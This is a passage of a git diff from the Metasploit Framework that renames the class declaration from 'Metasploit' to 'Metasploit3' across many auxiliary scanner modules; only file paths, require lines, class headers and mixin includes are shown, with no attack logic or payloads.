@@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index 2bad9d916f..015e81013f 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index d11cceb9bc..1c2f5a2132 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index 9dce6d9c00..3a388d677a 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index f113be1862..3c141366c7 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 8fb36131d0..ede1e33c3c 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 20b0c8da5b..53af795bcb 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 31f6c026e8..4918004f32 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index ce2b35d325..4b573346ae 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient # Scanner mixin should be near last diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index a470b6a64c..9a4c1e244f 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index c9f0822e19..6847640f9c 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/tomcat' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index 49daecb2b5..c4541ac09f 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 834a4985c7..86472e9648 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 22f050d4e3..188088b406 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index f80b2168d3..46fc088080 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Typo3 include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 8e5a5a6f26..329ad2b77f 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 0d01068564..48df7dd5e2 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index edc80bba06..4d0484a96a 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -13,7 +13,7 @@ require 'cgi' - class Metasploit < Msf::Auxiliary + class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb index 5b0aaa7ce7..163932d52a 100644 --- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb +++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 54d946ccba..9e768085ce 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 2982abc079..74bf30c54b 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index bdb4ce184b..42970aac95 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 56b31643f2..4fc1b55c75 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index 2f04fb8a7e..cb3381d0c8 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index 600f59042b..6486a74948 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index ecacc8f884..9b804e4bb4 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 08f79af4b8..2019d21f71 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index d33c57fb8d..d52d6c8f69 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_multicall' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 5bf85ed6e4..702d4b6bcc 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_scanner.rb b/modules/auxiliary/scanner/http/wordpress_scanner.rb index 0172a1556f..e4c5feef18 100644 --- a/modules/auxiliary/scanner/http/wordpress_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index b09f55dc1d..b46c204c6f 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_rpc' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 2da1992725..11c29161d2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index bf2d615f4e..d4384810b1 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index ffd4d97a66..1f9046447c 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index 26b6179dc7..88f9ca2081 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index f019fd4fb3..51404cbbd1 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'nokogiri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 2871fc07f1..7f0559721d 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 8aa30978e6..001e7a8f7a 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 7041bc87e2..4c6f1bcdfe 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/yaws_traversal.rb b/modules/auxiliary/scanner/http/yaws_traversal.rb index c36df4b5ec..26e8aa1815 100644 --- a/modules/auxiliary/scanner/http/yaws_traversal.rb +++ b/modules/auxiliary/scanner/http/yaws_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index 49a168bc3f..878b786208 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/zabbix' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb index bb4c8d7f4f..c50a870fe7 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index 85febf4447..095f3b2717 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 15c61a46aa..74ff3e3e3f 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Imap include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index ccbda3c467..aa3e1a9244 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'timeout' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index c6b812b4f3..abc8d604bd 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index 16473ee270..c6d1f16d8e 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index eb8262ae6d..0c497970b6 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/kademlia/server_info.rb b/modules/auxiliary/scanner/kademlia/server_info.rb index c697f48658..0f1c4508df 100644 --- a/modules/auxiliary/scanner/kademlia/server_info.rb +++ b/modules/auxiliary/scanner/kademlia/server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Kademlia diff --git a/modules/auxiliary/scanner/llmnr/query.rb b/modules/auxiliary/scanner/llmnr/query.rb index f7a131840e..74a8687efb 100644 --- a/modules/auxiliary/scanner/llmnr/query.rb +++ b/modules/auxiliary/scanner/llmnr/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::LLMNR diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 23181a3746..19a35e271d 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index 40306e09e1..c3e9ac94a5 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 96e3024d25..6df88ba9ee 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mdns/query.rb b/modules/auxiliary/scanner/mdns/query.rb index 98e96310ae..4412818e31 100644 --- a/modules/auxiliary/scanner/mdns/query.rb +++ b/modules/auxiliary/scanner/mdns/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::MDNS diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 919d93d302..2a1337914a 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 7da849808a..427053995b 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -1,4 +1,4 @@ -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index 47bed435ea..c497a8ff3d 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index 2adcd28017..e50e477f5e 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index c165dbbfd2..f62eb75a58 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 295d547e38..44f949da95 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 19166ad1e1..39a58fb004 100644 --- 